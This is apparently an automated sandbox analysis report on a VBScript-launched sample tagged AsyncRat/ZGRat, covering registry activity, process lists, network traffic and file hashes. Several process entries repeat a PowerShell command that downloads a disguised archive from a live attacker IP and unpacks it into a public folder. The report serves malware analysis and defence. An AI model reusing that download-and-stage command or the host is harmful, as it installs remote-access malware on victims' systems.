Analysis Overview
SHA256
e2228f06454d5c8033bb22ad4a81bbc3997e318bf34372a57232b51e8360f4d8
Threat Level: Known bad
The file g4.txt was found to be: Known bad.
Malicious Activity Summary
AsyncRat
Detect ZGRat V1
ZGRat
Downloads MZ/PE file
Checks computer location settings
Suspicious use of SetThreadContext
Enumerates physical storage devices
Modifies registry class
Suspicious use of WriteProcessMemory
Uses Task Scheduler COM API
Modifies Internet Explorer settings
Suspicious behavior: EnumeratesProcesses
Suspicious use of FindShellTrayWindow
Suspicious use of SendNotifyMessage
Suspicious use of AdjustPrivilegeToken
Suspicious use of SetWindowsHookEx
Enumerates system info in registry
Opens file in notepad (likely ransom note)
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2024-03-12 14:32
Signatures
Analysis: behavioral1
Detonation Overview
Submitted
2024-03-12 14:32
Reported
2024-03-12 14:46
Platform
win7-20240220-en
Max time kernel
350s
Max time network
705s
Command Line
Signatures
Enumerates physical storage devices
Enumerates system info in registry
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
Modifies Internet Explorer settings
| Description | Indicator | Process | Target |
| Set value (data) | \REGISTRY\USER\S-1-5-21-2721934792-624042501-2768869379-1000\Software\Microsoft\Internet Explorer\Main\Window_Placement = 2c0000000200000003000000ffffffffffffffffffffffffffffffff2400000024000000aa04000089020000 | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2721934792-624042501-2768869379-1000\Software\Microsoft\Internet Explorer\Main | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2721934792-624042501-2768869379-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive\{73A541C1-E07D-11EE-9A4D-7A846B3196C4} = "0" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2721934792-624042501-2768869379-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2721934792-624042501-2768869379-1000\Software\Microsoft\Internet Explorer\LowRegistry | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2721934792-624042501-2768869379-1000\Software\Microsoft\Internet Explorer\Zoom | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2721934792-624042501-2768869379-1000\Software\Microsoft\Internet Explorer\IETld\LowMic | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2721934792-624042501-2768869379-1000\Software\Microsoft\Internet Explorer\IntelliForms | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2721934792-624042501-2768869379-1000\Software\Microsoft\Internet Explorer\LowRegistry\DontShowMeThisDialogAgain | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2721934792-624042501-2768869379-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "1" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2721934792-624042501-2768869379-1000\Software\Microsoft\Internet Explorer\Toolbar | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2721934792-624042501-2768869379-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2721934792-624042501-2768869379-1000\Software\Microsoft\Internet Explorer\MINIE | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2721934792-624042501-2768869379-1000\Software\Microsoft\Internet Explorer\Main | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2721934792-624042501-2768869379-1000\Software\Microsoft\Internet Explorer\BrowserEmulation\LowMic | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2721934792-624042501-2768869379-1000\Software\Microsoft\Internet Explorer\Main\FullScreen = "no" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2721934792-624042501-2768869379-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "0" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2721934792-624042501-2768869379-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2721934792-624042501-2768869379-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2721934792-624042501-2768869379-1000\Software\Microsoft\Internet Explorer\Toolbar\WebBrowser | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2721934792-624042501-2768869379-1000\Software\Microsoft\Internet Explorer\Main\CompatibilityFlags = "0" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2721934792-624042501-2768869379-1000\Software\Microsoft\Internet Explorer\LowRegistry\DOMStorage | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2721934792-624042501-2768869379-1000\Software\Microsoft\Internet Explorer\PageSetup | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2721934792-624042501-2768869379-1000\Software\Microsoft\Internet Explorer\MINIE\TabBandWidth = "500" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2721934792-624042501-2768869379-1000\Software\Microsoft\Internet Explorer\GPU | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2721934792-624042501-2768869379-1000\Software\Microsoft\Internet Explorer\InternetRegistry | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
Opens file in notepad (likely ransom note)
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\Notepad.exe | N/A |
| N/A | N/A | C:\Windows\system32\NOTEPAD.EXE | N/A |
| N/A | N/A | C:\Windows\System32\notepad.exe | N/A |
| N/A | N/A | C:\Windows\system32\NOTEPAD.EXE | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| N/A | N/A | C:\WINDOWS\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\WINDOWS\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
Suspicious use of FindShellTrayWindow
Suspicious use of SendNotifyMessage
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| N/A | N/A | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
| N/A | N/A | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\g4.vbs"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Start-BitsTransfer -Source 'http://104.243.44.136:777/moh.jpg' -Destination 'C:\Users\Public\ben.zip'; Expand-Archive -Path 'C:\Users\Public\ben.zip' -DestinationPath 'C:\Users\Public\' -Force
C:\Windows\explorer.exe
"C:\Windows\explorer.exe"
C:\Program Files\Internet Explorer\iexplore.exe
"C:\Program Files\Internet Explorer\iexplore.exe" http://users/
C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:1772 CREDAT:275457 /prefetch:2
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe"
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=106.0.5249.119 --initial-client-data=0xc0,0xc4,0xc8,0x94,0xcc,0x7fef4dd9758,0x7fef4dd9768,0x7fef4dd9778
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1176 --field-trial-handle=1200,i,5660191629799940190,1500305782023709507,131072 /prefetch:2
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1512 --field-trial-handle=1200,i,5660191629799940190,1500305782023709507,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=1600 --field-trial-handle=1200,i,5660191629799940190,1500305782023709507,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --first-renderer-process --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=2292 --field-trial-handle=1200,i,5660191629799940190,1500305782023709507,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=2300 --field-trial-handle=1200,i,5660191629799940190,1500305782023709507,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe
"C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe"
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=angle --use-angle=swiftshader-webgl --mojo-platform-channel-handle=1284 --field-trial-handle=1200,i,5660191629799940190,1500305782023709507,131072 /prefetch:2
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --mojo-platform-channel-handle=1448 --field-trial-handle=1200,i,5660191629799940190,1500305782023709507,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3700 --field-trial-handle=1200,i,5660191629799940190,1500305782023709507,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --mojo-platform-channel-handle=3720 --field-trial-handle=1200,i,5660191629799940190,1500305782023709507,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --mojo-platform-channel-handle=3184 --field-trial-handle=1200,i,5660191629799940190,1500305782023709507,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --mojo-platform-channel-handle=3752 --field-trial-handle=1200,i,5660191629799940190,1500305782023709507,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --mojo-platform-channel-handle=3888 --field-trial-handle=1200,i,5660191629799940190,1500305782023709507,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --mojo-platform-channel-handle=3396 --field-trial-handle=1200,i,5660191629799940190,1500305782023709507,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1880 --field-trial-handle=1200,i,5660191629799940190,1500305782023709507,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=16 --mojo-platform-channel-handle=2508 --field-trial-handle=1200,i,5660191629799940190,1500305782023709507,131072 /prefetch:1
C:\WINDOWS\system32\WindowsPowerShell\v1.0\powershell.exe
"C:\WINDOWS\system32\WindowsPowerShell\v1.0\powershell.exe"
C:\Windows\system32\NOTEPAD.EXE
"C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\Desktop\a.txt
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "-file" "C:\Users\Admin\Desktop\a.ps1"
C:\WINDOWS\system32\WindowsPowerShell\v1.0\powershell.exe
"C:\WINDOWS\system32\WindowsPowerShell\v1.0\powershell.exe"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" C:\Users\Admin\Desktop\a.ps1
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -executionpolicy bypass
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" C:\Users\Admin\Desktop\a.ps1
C:\Windows\System32\notepad.exe
"C:\Windows\System32\notepad.exe" "C:\Users\Admin\Desktop\a.ps1"
C:\Windows\system32\NOTEPAD.EXE
"C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\Desktop\aaa.txt
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Desktop\aaa.vbs"
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Desktop\a.vbs"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Start-BitsTransfer -Source 'http://104.243.44.136:777/moh.jpg' -Destination 'C:\Users\Public\ben.zip'; Expand-Archive -Path 'C:\Users\Public\ben.zip' -DestinationPath 'C:\Users\Public\' -Force
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Desktop\a.vbs"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Start-BitsTransfer -Source 'http://104.243.44.136:777/moh.jpg' -Destination 'C:\Users\Public\ben.zip'; Expand-Archive -Path 'C:\Users\Public\ben.zip' -DestinationPath 'C:\Users\Public\' -Force
C:\Windows\explorer.exe
"C:\Windows\explorer.exe"
C:\Windows\system32\AUDIODG.EXE
C:\Windows\system32\AUDIODG.EXE 0x4fc
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Desktop\a.vbs"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Start-BitsTransfer -Source 'http://104.243.44.136:777/moh.jpg' -Destination 'C:\Users\Public\ben.zip'; Expand-Archive -Path 'C:\Users\Public\ben.zip' -DestinationPath 'C:\Users\Public\' -Force
C:\Windows\System32\CScript.exe
"C:\Windows\System32\CScript.exe" "C:\Users\Admin\Desktop\a.vbs"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Start-BitsTransfer -Source 'http://104.243.44.136:777/moh.jpg' -Destination 'C:\Users\Public\ben.zip'; Expand-Archive -Path 'C:\Users\Public\ben.zip' -DestinationPath 'C:\Users\Public\' -Force
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Desktop\a.vbs"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Start-BitsTransfer -Source 'http://104.243.44.136:777/moh.jpg' -Destination 'C:\Users\Public\ben.zip'; Expand-Archive -Path 'C:\Users\Public\ben.zip' -DestinationPath 'C:\Users\Public\' -Force
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Desktop\a.vbs"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Start-BitsTransfer -Source 'http://104.243.44.136:777/moh.jpg' -Destination 'C:\Users\Public\ben.zip'; Expand-Archive -Path 'C:\Users\Public\ben.zip' -DestinationPath 'C:\Users\Public\' -Force
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Desktop\a.vbs"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Start-BitsTransfer -Source 'http://104.243.44.136:777/moh.jpg' -Destination 'C:\Users\Public\ben.zip'; Expand-Archive -Path 'C:\Users\Public\ben.zip' -DestinationPath 'C:\Users\Public\' -Force
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Desktop\aaa.vbs"
C:\Windows\System32\Notepad.exe
"C:\Windows\System32\Notepad.exe" C:\Users\Admin\Desktop\a.vbs
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Desktop\a.vbs"
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Desktop\a.vbs"
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | www.google.com | udp |
| NL | 142.251.36.4:443 | www.google.com | udp |
| NL | 142.251.36.4:443 | www.google.com | tcp |
| N/A | 224.0.0.251:5353 | N/A | udp |
| US | 104.243.44.136:80 | N/A | tcp |
| US | 104.243.44.136:80 | N/A | tcp |
| US | 104.243.44.136:80 | N/A | tcp |
| US | 104.243.44.136:80 | N/A | tcp |
| US | 104.243.44.136:443 | N/A | tcp |
| US | 104.243.44.136:443 | N/A | tcp |
| US | 104.243.44.136:443 | N/A | tcp |
| NL | 216.58.214.3:80 | www.gstatic.com | tcp |
| US | 8.8.8.8:53 | beacons.gcp.gvt2.com | udp |
| US | 74.125.137.94:443 | beacons.gcp.gvt2.com | tcp |
| US | 104.243.44.136:443 | N/A | tcp |
| US | 104.243.44.136:443 | N/A | tcp |
| US | 104.243.44.136:443 | 104.243.44.136 | tcp |
| US | 74.125.137.94:443 | beacons.gcp.gvt2.com | udp |
| US | 74.125.137.94:443 | beacons.gcp.gvt2.com | tcp |
Files
memory/2920-4-0x000000001B720000-0x000000001BA02000-memory.dmp
memory/2920-5-0x00000000026F0000-0x00000000026F8000-memory.dmp
memory/2920-6-0x000007FEF5A30000-0x000007FEF63CD000-memory.dmp
memory/2920-7-0x0000000002870000-0x00000000028F0000-memory.dmp
memory/2920-8-0x000007FEF5A30000-0x000007FEF63CD000-memory.dmp
memory/2920-9-0x0000000002870000-0x00000000028F0000-memory.dmp
memory/2920-10-0x0000000002870000-0x00000000028F0000-memory.dmp
memory/2920-11-0x000007FEF5A30000-0x000007FEF63CD000-memory.dmp
\??\pipe\crashpad_552_UFWQIIINUEXGHRGS
| MD5 | d41d8cd98f00b204e9800998ecf8427e |
| SHA1 | da39a3ee5e6b4b0d3255bfef95601890afd80709 |
| SHA256 | e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 |
| SHA512 | cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Sync Data\LevelDB\000007.dbtmp
| MD5 | 18e723571b00fb1694a3bad6c78e4054 |
| SHA1 | afcc0ef32d46fe59e0483f9a3c891d3034d12f32 |
| SHA256 | 8af72f43857550b01eab1019335772b367a17a9884a7a759fdf4fe6f272b90aa |
| SHA512 | 43bb0af7d3984012d2d67ca6b71f0201e5b948e6fe26a899641c4c6f066c59906d468ddf7f1df5ea5fa33c2bc5ea8219c0f2c82e0a5c365ad7581b898a8859e2 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\GPUCache\data_1
| MD5 | f50f89a0a91564d0b8a211f8921aa7de |
| SHA1 | 112403a17dd69d5b9018b8cede023cb3b54eab7d |
| SHA256 | b1e963d702392fb7224786e7d56d43973e9b9efd1b89c17814d7c558ffc0cdec |
| SHA512 | bf8cda48cf1ec4e73f0dd1d4fa5562af1836120214edb74957430cd3e4a2783e801fa3f4ed2afb375257caeed4abe958265237d6e0aacf35a9ede7a2e8898d58 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\GCM Store\Encryption\000006.dbtmp
| MD5 | aefd77f47fb84fae5ea194496b44c67a |
| SHA1 | dcfbb6a5b8d05662c4858664f81693bb7f803b82 |
| SHA256 | 4166bf17b2da789b0d0cc5c74203041d98005f5d4ef88c27e8281e00148cd611 |
| SHA512 | b733d502138821948267a8b27401d7c0751e590e1298fda1428e663ccd02f55d0d2446ff4bc265bdcdc61f952d13c01524a5341bc86afc3c2cde1d8589b2e1c3 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State
| MD5 | 07d6a990d48d06a61fd3e7e83c1c1d1c |
| SHA1 | da2e6cdc9a70a5da52655f3cb2b9f06071c07d5c |
| SHA256 | 7d06579813d4309157456e76d8b5cefc7efa4ed45bdc00e932323f4f361c4253 |
| SHA512 | 1cd0eb1b9baa62208ad0e7c1ec34735e42dd9bc23c14ff72ba66795b6570eb3b706b609d27d144a628a37b2b7d9e67fcb222fd26d63a4dd537afafc573dadb4f |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences
| MD5 | f3886cb2abbd410384d2e247c1a19520 |
| SHA1 | 90f9e2b731fa513c1e86b638460df7d718ad0b07 |
| SHA256 | 50dbdc0db6f0d6fdc0e792c2b2fcfef681c2d3c9f9c5f9ffe2e6a23dca06378b |
| SHA512 | 95bfaf449af0231d3dc60e7dcc5ef6e5f265db3ac29890533bdc592d2feff493796b7d058a477fbe3042362d0cc382c1e02bd77af51b6036137fd4f8b3fe5a54 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences
| MD5 | b233c62080702539447e5a72cdede799 |
| SHA1 | c2ff017b4be967a0646420e2a46a327779a2f1c9 |
| SHA256 | e549acf1a8b5e2d31a26c3694302a5b0c28f0cf51b3dae9960613ea0655ece41 |
| SHA512 | 9471a6be1204970ed0968f72a2f7537a4c5c2284c6c87d1b149fe5b4178b581fc551a8c12839aace012336c65814c65f69dabe2e871262b35a5a8557bf17db5e |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences
| MD5 | 14cc8305ff7b6186efbae3b462fb60df |
| SHA1 | 1c2ace083e6a7a86956e6f890524c065b572878b |
| SHA256 | 734816f6f9791578d22c82213884a3cf8fa0b7ab83ee85fad9c5e6798d4bbe9e |
| SHA512 | 00e0521d2188a69b1829d43db7b4f55898a1b649295d0c9fb98d7be088e8585ec6af7feb2e1645edd349380373973a94ffa77a6b6a4f2205d13760a3a8789c5f |
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
| MD5 | d5ab74ae398f2d9b648d5fe5c4779a91 |
| SHA1 | 617ae2d562c55ab47608003f1625c7e06a3915a2 |
| SHA256 | af4f562ecaf11c4f71ac62fa6ca1cca2face95aaf247820b70ddd01e2d01284b |
| SHA512 | b14b252d32a557c82b94020c87722e3cbc75afc688bcb3c492c9bc2a327da7906ef04efb05887f92e18569c825755ab8c862026aacc789e934dbf54c7cbb6dff |
memory/300-177-0x000007FEF2520000-0x000007FEF2EBD000-memory.dmp
memory/300-176-0x000000001B6D0000-0x000000001B9B2000-memory.dmp
memory/300-179-0x0000000002C20000-0x0000000002CA0000-memory.dmp
memory/300-178-0x00000000020B0000-0x00000000020B8000-memory.dmp
memory/300-181-0x0000000002C20000-0x0000000002CA0000-memory.dmp
memory/300-180-0x000007FEF2520000-0x000007FEF2EBD000-memory.dmp
memory/300-183-0x0000000002C20000-0x0000000002CA0000-memory.dmp
memory/300-182-0x0000000002C20000-0x0000000002CA0000-memory.dmp
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences
| MD5 | cadd7e6cf4e00a0cb1eed886fabeea2d |
| SHA1 | 85253620e109ba0d4e8aa58e37e9fa23ee750ae5 |
| SHA256 | 8a540158f7b0f8c5c459350aaeaca020a97d8339e87b87aa2295c1ddf8878ed7 |
| SHA512 | 59adbac128efb40f9164fbee4f719cb73502bffacb86dd4e42cebe29704f05f7468bf7be99aa0453589695a22146106fb815e2df1c0c0bec6fef91fac9d81868 |
memory/300-191-0x0000000002C20000-0x0000000002CA0000-memory.dmp
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\ef61fcc9-be5e-439b-a380-392b8ddc9ac7.tmp
| MD5 | 05705d148f14867cd4640a04eb817514 |
| SHA1 | adbf4fe123a665079de80164e90a87e3d70682af |
| SHA256 | a1da84bf5b90d067dbe112810afa07a87d803398950b937c03816f1d1266198d |
| SHA512 | 89d9ea32df6661e912429110cb4d748195ec31a42913f23d8337df5d315f610558606ed7c14f934fa88b395f2376328514f93d6157cfbf334f9416920b133606 |
memory/300-199-0x000007FEF2520000-0x000007FEF2EBD000-memory.dmp
memory/300-208-0x000007FEF2520000-0x000007FEF2EBD000-memory.dmp
